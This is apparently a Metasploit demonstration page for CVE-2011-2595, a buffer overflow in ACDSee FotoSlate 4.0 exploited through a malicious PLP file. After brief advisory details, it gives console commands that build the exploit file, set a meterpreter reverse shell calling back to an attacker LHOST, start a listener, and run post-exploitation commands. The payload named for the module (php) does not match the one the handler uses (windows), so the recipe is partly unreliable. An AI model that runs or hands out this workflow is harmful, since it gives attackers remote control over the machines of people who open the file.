CVE-2011-2595 ACDSee FotoSlate PLP File id Parameter Overflow Metasploit Demo

Timeline :

Vulnerability discovered by Parvez Anwar
Public release of the vulnerability the 2011-09-12
Metasploit PoC provided the 2011-10-10

PoC provided by :

Parvez Anwar
juan vazquez

Reference(s) :

CVE-2011-2595
OSVDB-75425

Affected version(s) :

ACDSee FotoSlate 4.0 Build 146 is vulnerable, other versions may also be affected.

Tested on Windows XP SP3 with :

ACDSee FotoSlate 4.0 Build 146

Description :

This module exploits a buffer overflow in ACDSee FotoSlate 4.0 Build 146 via a specially crafted id parameter in a String element. When viewing a malicious PLP file with the ACDSee FotoSlate product, a remote attacker could overflow a buffer and execute arbitrary code. This exploit has been tested on systems such as Windows XP SP3, Windows Vista, and Windows 7.

Commands :

use exploit/windows/fileformat/acdsee_fotoslate_string
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
exploit -j

getuid
sysinfo